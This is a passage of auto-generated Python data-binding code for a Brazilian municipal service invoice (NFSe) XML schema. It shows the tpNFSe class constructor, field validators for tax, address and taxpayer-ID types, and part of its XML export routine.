DDDPrestador=None, TelefonePrestador=None, DDDTomador=None, TelefoneTomador=None, MotCancelamento=None, CPFCNPJIntermediario=None, Deducoes=None, Itens=None):
self.original_tagname_ = None
self.NumeroNota = NumeroNota
self.validate_tpNumero(self.NumeroNota)
if isinstance(DataProcessamento, BaseStrType_):
initvalue_ = datetime_.datetime.strptime(DataProcessamento, '%Y-%m-%dT%H:%M:%S')
else:
initvalue_ = DataProcessamento
self.DataProcessamento = initvalue_
self.NumeroLote = NumeroLote
self.validate_tpNumero(self.NumeroLote)
self.CodigoVerificacao = CodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
self.Assinatura = Assinatura
self.validate_tpAssinatura(self.Assinatura)
self.InscricaoMunicipalPrestador = InscricaoMunicipalPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
self.RazaoSocialPrestador = RazaoSocialPrestador
self.validate_tpRazaoSocialPrestador(self.RazaoSocialPrestador)
self.TipoRPS = TipoRPS
self.validate_tpTipoRPS(self.TipoRPS)
self.SerieRPS = SerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
self.NumeroRPS = NumeroRPS
self.validate_tpNumero(self.NumeroRPS)
if isinstance(DataEmissaoRPS, BaseStrType_):
initvalue_ = datetime_.datetime.strptime(DataEmissaoRPS, '%Y-%m-%dT%H:%M:%S')
else:
initvalue_ = DataEmissaoRPS
self.DataEmissaoRPS = initvalue_
self.SituacaoRPS = SituacaoRPS
self.validate_tpSituacaoRPS(self.SituacaoRPS)
self.SerieRPSSubstituido = SerieRPSSubstituido
self.validate_tpSerieRPSSubstituido(self.SerieRPSSubstituido)
self.NumeroRPSSubstituido = NumeroRPSSubstituido
self.validate_tpNumeroComZero(self.NumeroRPSSubstituido)
self.NumeroNFSeSubstituida = NumeroNFSeSubstituida
self.validate_tpNumeroComZero(self.NumeroNFSeSubstituida)
self.DataEmissaoNFSeSubstituida = DataEmissaoNFSeSubstituida
self.validate_tpDataHoraNulo(self.DataEmissaoNFSeSubstituida)
self.SeriePrestacao = SeriePrestacao
self.validate_tpSeriePrestacao(self.SeriePrestacao)
self.InscricaoMunicipalTomador = InscricaoMunicipalTomador
self.validate_tpInscricaoMunicipalNulo(self.InscricaoMunicipalTomador)
self.CPFCNPJTomador = CPFCNPJTomador
self.validate_tpCPFCNPJ(self.CPFCNPJTomador)
self.RazaoSocialTomador = RazaoSocialTomador
self.validate_tpRazaoSocial(self.RazaoSocialTomador)
self.DocTomadorEstrangeiro = DocTomadorEstrangeiro
self.validate_tpDocTomadorEstrangeiro(self.DocTomadorEstrangeiro)
self.TipoLogradouroTomador = TipoLogradouroTomador
self.validate_tpTipoLogradouro(self.TipoLogradouroTomador)
self.LogradouroTomador = LogradouroTomador
self.validate_tpLogradouro(self.LogradouroTomador)
self.NumeroEnderecoTomador = NumeroEnderecoTomador
self.validate_tpNumeroEndereco(self.NumeroEnderecoTomador)
self.ComplementoEnderecoTomador = ComplementoEnderecoTomador
self.validate_tpComplementoEndereco(self.ComplementoEnderecoTomador)
self.TipoBairroTomador = TipoBairroTomador
self.validate_tpTipoBairro(self.TipoBairroTomador)
self.BairroTomador = BairroTomador
self.validate_tpBairro(self.BairroTomador)
self.CidadeTomador = CidadeTomador
self.validate_tpCodCidade(self.CidadeTomador)
self.CidadeTomadorDescricao = CidadeTomadorDescricao
self.validate_tpCidadeTomadorDescricao(self.CidadeTomadorDescricao)
self.CEPTomador = CEPTomador
self.validate_tpCEPNulo(self.CEPTomador)
self.EmailTomador = EmailTomador
self.validate_tpEmail(self.EmailTomador)
self.CodigoAtividade = CodigoAtividade
self.validate_tpCodigoAtividade(self.CodigoAtividade)
self.AliquotaAtividade = AliquotaAtividade
self.validate_tpAliquota(self.AliquotaAtividade)
self.TipoRecolhimento = TipoRecolhimento
self.validate_tpTipoRecolhimento(self.TipoRecolhimento)
self.MunicipioPrestacao = MunicipioPrestacao
self.validate_tpCodCidade(self.MunicipioPrestacao)
self.MunicipioPrestacaoDescricao = MunicipioPrestacaoDescricao
self.validate_tpCidadeDescricao(self.MunicipioPrestacaoDescricao)
self.Operacao = Operacao
self.validate_tpOperacao(self.Operacao)
self.Tributacao = Tributacao
self.validate_tpTributacao(self.Tributacao)
self.ValorPIS = ValorPIS
self.validate_tpValor(self.ValorPIS)
self.ValorCOFINS = ValorCOFINS
self.validate_tpValor(self.ValorCOFINS)
self.ValorINSS = ValorINSS
self.validate_tpValor(self.ValorINSS)
self.ValorIR = ValorIR
self.validate_tpValor(self.ValorIR)
self.ValorCSLL = ValorCSLL
self.validate_tpValor(self.ValorCSLL)
self.AliquotaPIS = AliquotaPIS
self.validate_tpAliquota(self.AliquotaPIS)
self.AliquotaCOFINS = AliquotaCOFINS
self.validate_tpAliquota(self.AliquotaCOFINS)
self.AliquotaINSS = AliquotaINSS
self.validate_tpAliquota(self.AliquotaINSS)
self.AliquotaIR = AliquotaIR
self.validate_tpAliquota(self.AliquotaIR)
self.AliquotaCSLL = AliquotaCSLL
self.validate_tpAliquota(self.AliquotaCSLL)
self.DescricaoRPS = DescricaoRPS
self.validate_tpDescricaoRPS(self.DescricaoRPS)
self.DDDPrestador = DDDPrestador
self.validate_tpDDDNulo(self.DDDPrestador)
self.TelefonePrestador = TelefonePrestador
self.validate_tpFoneNulo(self.TelefonePrestador)
self.DDDTomador = DDDTomador
self.validate_tpDDDNulo(self.DDDTomador)
self.TelefoneTomador = TelefoneTomador
self.validate_tpFoneNulo(self.TelefoneTomador)
self.MotCancelamento = MotCancelamento
self.validate_tpMotCancelamento(self.MotCancelamento)
self.CPFCNPJIntermediario = CPFCNPJIntermediario
self.validate_tpCPFCNPJnulo(self.CPFCNPJIntermediario)
self.Deducoes = Deducoes
self.Itens = Itens
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpNFSe.subclass:
return tpNFSe.subclass(*args_, **kwargs_)
else:
return tpNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpCodigoVerificacao(self, value):
# Validate type tpCodigoVerificacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 255:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
def validate_tpAssinatura(self, value):
# Validate type tpAssinatura, a restriction on xs:base64Binary.
if value is not None and Validate_simpletypes_:
pass
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpInscricaoMunicipal_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpRazaoSocialPrestador(self, value):
# Validate type tpRazaoSocialPrestador, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 120:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpRazaoSocialPrestador' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpRazaoSocialPrestador' % {"value" : value.encode("utf-8")} )
def validate_tpTipoRPS(self, value):
# Validate type tpTipoRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['RPS']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpTipoRPS' % {"value" : value.encode("utf-8")} )
if len(value) > 20:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoRPS' % {"value" : value.encode("utf-8")} )
def validate_tpSerieRPS(self, value):
# Validate type tpSerieRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['NF']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpSerieRPS' % {"value" : value.encode("utf-8")} )
def validate_tpDataHora(self, value):
# Validate type tpDataHora, a restriction on xs:dateTime.
if value is not None and Validate_simpletypes_:
pass
def validate_tpSituacaoRPS(self, value):
# Validate type tpSituacaoRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['N', 'C']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpSituacaoRPS' % {"value" : value.encode("utf-8")} )
def validate_tpSerieRPSSubstituido(self, value):
# Validate type tpSerieRPSSubstituido, a restriction on None.
pass
def validate_tpNumeroComZero(self, value):
# Validate type tpNumeroComZero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumeroComZero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumeroComZero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumeroComZero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumeroComZero_patterns_, ))
validate_tpNumeroComZero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpDataHoraNulo(self, value):
# Validate type tpDataHoraNulo, a restriction on None.
pass
def validate_tpSeriePrestacao(self, value):
# Validate type tpSeriePrestacao, a restriction on xs:byte.
if value is not None and Validate_simpletypes_:
if value < 1:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpSeriePrestacao' % {"value" : value} )
if value > 99:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpSeriePrestacao' % {"value" : value} )
def validate_tpInscricaoMunicipalNulo(self, value):
# Validate type tpInscricaoMunicipalNulo, a restriction on None.
pass
def validate_tpCPFCNPJ(self, value):
# Validate type tpCPFCNPJ, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCPFCNPJ_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCPFCNPJ_patterns_, ))
validate_tpCPFCNPJ_patterns_ = [['^[0-9]{11}$|^[0-9]{14}$']]
def validate_tpRazaoSocial(self, value):
# Validate type tpRazaoSocial, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 120:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
def validate_tpDocTomadorEstrangeiro(self, value):
# Validate type tpDocTomadorEstrangeiro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 20:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpDocTomadorEstrangeiro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpDocTomadorEstrangeiro' % {"value" : value.encode("utf-8")} )
def validate_tpTipoLogradouro(self, value):
# Validate type tpTipoLogradouro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 10:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoLogradouro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpTipoLogradouro' % {"value" : value.encode("utf-8")} )
def validate_tpLogradouro(self, value):
# Validate type tpLogradouro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpLogradouro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpLogradouro' % {"value" : value.encode("utf-8")} )
def validate_tpNumeroEndereco(self, value):
# Validate type tpNumeroEndereco, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 9:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpNumeroEndereco' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpNumeroEndereco' % {"value" : value.encode("utf-8")} )
def validate_tpComplementoEndereco(self, value):
# Validate type tpComplementoEndereco, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 30:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpComplementoEndereco' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpComplementoEndereco' % {"value" : value.encode("utf-8")} )
def validate_tpTipoBairro(self, value):
# Validate type tpTipoBairro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 10:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoBairro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpTipoBairro' % {"value" : value.encode("utf-8")} )
def validate_tpBairro(self, value):
# Validate type tpBairro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpBairro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpBairro' % {"value" : value.encode("utf-8")} )
def validate_tpCodCidade(self, value):
# Validate type tpCodCidade, a restriction on xs:unsignedInt.
if value is not None and Validate_simpletypes_:
if value < 1:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpCodCidade' % {"value" : value} )
def validate_tpCidadeTomadorDescricao(self, value):
# Validate type tpCidadeTomadorDescricao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCidadeTomadorDescricao' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCidadeTomadorDescricao' % {"value" : value.encode("utf-8")} )
def validate_tpCEPNulo(self, value):
# Validate type tpCEPNulo, a restriction on None.
pass
def validate_tpEmail(self, value):
# Validate type tpEmail, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 60:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpEmail' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpEmail' % {"value" : value.encode("utf-8")} )
def validate_tpCodigoAtividade(self, value):
# Validate type tpCodigoAtividade, a restriction on xs:int.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCodigoAtividade_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCodigoAtividade_patterns_, ))
validate_tpCodigoAtividade_patterns_ = [['^[0-9]{9}$']]
def validate_tpAliquota(self, value):
# Validate type tpAliquota, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpAliquota' % {"value" : value} )
if len(str(value)) >= 6:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpAliquota' % {"value" : value} )
def validate_tpTipoRecolhimento(self, value):
# Validate type tpTipoRecolhimento, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['A', 'R']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpTipoRecolhimento' % {"value" : value.encode("utf-8")} )
def validate_tpCidadeDescricao(self, value):
# Validate type tpCidadeDescricao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 30:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCidadeDescricao' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCidadeDescricao' % {"value" : value.encode("utf-8")} )
def validate_tpOperacao(self, value):
# Validate type tpOperacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['A', 'B', 'C', 'D', 'J']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpOperacao' % {"value" : value.encode("utf-8")} )
def validate_tpTributacao(self, value):
# Validate type tpTributacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['C', 'F', 'K', 'E', 'T', 'H', 'G', 'N', 'M']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpTributacao' % {"value" : value.encode("utf-8")} )
def validate_tpValor(self, value):
# Validate type tpValor, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpValor' % {"value" : value} )
if len(str(value)) >= 15:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpValor' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpValor_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpValor_patterns_, ))
validate_tpValor_patterns_ = [['^0$|^0\\.[0-9]{2}$|^[1-9]{1}[0-9]{0,12}(\\.[0-9]{0,2})?$']]
def validate_tpDescricaoRPS(self, value):
# Validate type tpDescricaoRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 1500:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpDescricaoRPS' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpDescricaoRPS' % {"value" : value.encode("utf-8")} )
def validate_tpDDDNulo(self, value):
# Validate type tpDDDNulo, a restriction on None.
pass
def validate_tpFoneNulo(self, value):
# Validate type tpFoneNulo, a restriction on None.
pass
def validate_tpMotCancelamento(self, value):
# Validate type tpMotCancelamento, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 80:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpMotCancelamento' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpMotCancelamento' % {"value" : value.encode("utf-8")} )
def validate_tpCPFCNPJnulo(self, value):
# Validate type tpCPFCNPJnulo, a restriction on None.
pass
def hasContent_(self):
if (
self.NumeroNota is not None or
self.DataProcessamento is not None or
self.NumeroLote is not None or
self.CodigoVerificacao is not None or
self.Assinatura is not None or
self.InscricaoMunicipalPrestador is not None or
self.RazaoSocialPrestador is not None or
self.TipoRPS is not None or
self.SerieRPS is not None or
self.NumeroRPS is not None or
self.DataEmissaoRPS is not None or
self.SituacaoRPS is not None or
self.SerieRPSSubstituido is not None or
self.NumeroRPSSubstituido is not None or
self.NumeroNFSeSubstituida is not None or
self.DataEmissaoNFSeSubstituida is not None or
self.SeriePrestacao is not None or
self.InscricaoMunicipalTomador is not None or
self.CPFCNPJTomador is not None or
self.RazaoSocialTomador is not None or
self.DocTomadorEstrangeiro is not None or
self.TipoLogradouroTomador is not None or
self.LogradouroTomador is not None or
self.NumeroEnderecoTomador is not None or
self.ComplementoEnderecoTomador is not None or
self.TipoBairroTomador is not None or
self.BairroTomador is not None or
self.CidadeTomador is not None or
self.CidadeTomadorDescricao is not None or
self.CEPTomador is not None or
self.EmailTomador is not None or
self.CodigoAtividade is not None or
self.AliquotaAtividade is not None or
self.TipoRecolhimento is not None or
self.MunicipioPrestacao is not None or
self.MunicipioPrestacaoDescricao is not None or
self.Operacao is not None or
self.Tributacao is not None or
self.ValorPIS is not None or
self.ValorCOFINS is not None or
self.ValorINSS is not None or
self.ValorIR is not None or
self.ValorCSLL is not None or
self.AliquotaPIS is not None or
self.AliquotaCOFINS is not None or
self.AliquotaINSS is not None or
self.AliquotaIR is not None or
self.AliquotaCSLL is not None or
self.DescricaoRPS is not None or
self.DDDPrestador is not None or
self.TelefonePrestador is not None or
self.DDDTomador is not None or
self.TelefoneTomador is not None or
self.MotCancelamento is not None or
self.CPFCNPJIntermediario is not None or
self.Deducoes is not None or
self.Itens is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpNFSe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.NumeroNota is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNota>%s</ns1:NumeroNota>%s' % (self.gds_format_integer(self.NumeroNota, input_name='NumeroNota'), eol_))
if self.DataProcessamento is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataProcessamento>%s</ns1:DataProcessamento>%s' % (self.gds_format_datetime(self.DataProcessamento, input_name='DataProcessamento'), eol_))
if self.NumeroLote is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroLote>%s</ns1:NumeroLote>%s' % (self.gds_format_integer(self.NumeroLote, input_name='NumeroLote'), eol_))
if self.CodigoVerificacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CodigoVerificacao>%s</ns1:CodigoVerificacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CodigoVerificacao), input_name='CodigoVerificacao')), eol_))
if self.Assinatura is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Assinatura>%s</ns1:Assinatura>%s' % (self.gds_format_base64(self.Assinatura, input_name='Assinatura'), eol_))
if self.InscricaoMunicipalPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoMunicipalPrestador>%s</ns1:InscricaoMunicipalPrestador>%s' % (self.gds_format_integer(self.InscricaoMunicipalPrestador, input_name='InscricaoMunicipalPrestador'), eol_))
if self.RazaoSocialPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:RazaoSocialPrestador>%s</ns1:RazaoSocialPrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.RazaoSocialPrestador), input_name='RazaoSocialPrestador')), eol_))
if self.TipoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoRPS>%s</ns1:TipoRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoRPS), input_name='TipoRPS')), eol_))
if self.SerieRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SerieRPS>%s</ns1:SerieRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SerieRPS), input_name='SerieRPS')), eol_))
if self.NumeroRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroRPS>%s</ns1:NumeroRPS>%s' % (self.gds_format_integer(self.NumeroRPS, input_name='NumeroRPS'), eol_))
if self.DataEmissaoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataEmissaoRPS>%s</ns1:DataEmissaoRPS>%s' % (self.gds_format_datetime(self.DataEmissaoRPS, input_name='DataEmissaoRPS'), eol_))
if self.SituacaoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SituacaoRPS>%s</ns1:SituacaoRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SituacaoRPS), input_name='SituacaoRPS')), eol_))
if self.SerieRPSSubstituido is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SerieRPSSubstituido>%s</ns1:SerieRPSSubstituido>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SerieRPSSubstituido), input_name='SerieRPSSubstituido')), eol_))
if self.NumeroRPSSubstituido is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroRPSSubstituido>%s</ns1:NumeroRPSSubstituido>%s' % (self.gds_format_integer(self.NumeroRPSSubstituido, input_name='NumeroRPSSubstituido'), eol_))
if self.NumeroNFSeSubstituida is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNFSeSubstituida>%s</ns1:NumeroNFSeSubstituida>%s' % (self.gds_format_integer(self.NumeroNFSeSubstituida, input_name='NumeroNFSeSubstituida'), eol_))
if self.DataEmissaoNFSeSubstituida is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataEmissaoNFSeSubstituida>%s</ns1:DataEmissaoNFSeSubstituida>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DataEmissaoNFSeSubstituida), input_name='DataEmissaoNFSeSubstituida')), eol_))
if self.SeriePrestacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SeriePrestacao>%s</ns1:SeriePrestacao>%s' % (self.gds_format_integer(self.SeriePrestacao, input_name='SeriePrestacao'), eol_))
if self.InscricaoMunicipalTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoMunicipalTomador>%s</ns1:InscricaoMunicipalTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.InscricaoMunicipalTomador), input_name='InscricaoMunicipalTomador')), eol_))
if self.CPFCNPJTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPFCNPJTomador>%s</ns1:CPFCNPJTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPFCNPJTomador), input_name='CPFCNPJTomador')), eol_))
if self.RazaoSocialTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:RazaoSocialTomador>%s</ns1:RazaoSocialTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.RazaoSocialTomador), input_name='RazaoSocialTomador')), eol_))
if self.DocTomadorEstrangeiro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DocTomadorEstrangeiro>%s</ns1:DocTomadorEstrangeiro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DocTomadorEstrangeiro), input_name='DocTomadorEstrangeiro')), eol_))
if self.TipoLogradouroTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoLogradouroTomador>%s</ns1:TipoLogradouroTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoLogradouroTomador), input_name='TipoLogradouroTomador')), eol_))
if self.LogradouroTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:LogradouroTomador>%s</ns1:LogradouroTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.LogradouroTomador), input_name='LogradouroTomador')), eol_))
if self.NumeroEnderecoTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroEnderecoTomador>%s</ns1:NumeroEnderecoTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.NumeroEnderecoTomador), input_name='NumeroEnderecoTomador')), eol_))
if self.ComplementoEnderecoTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ComplementoEnderecoTomador>%s</ns1:ComplementoEnderecoTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.ComplementoEnderecoTomador), input_name='ComplementoEnderecoTomador')), eol_))
if self.TipoBairroTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoBairroTomador>%s</ns1:TipoBairroTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoBairroTomador), input_name='TipoBairroTomador')), eol_))
if self.BairroTomador is not None:
showIndent(outfile, level, pretty_print)
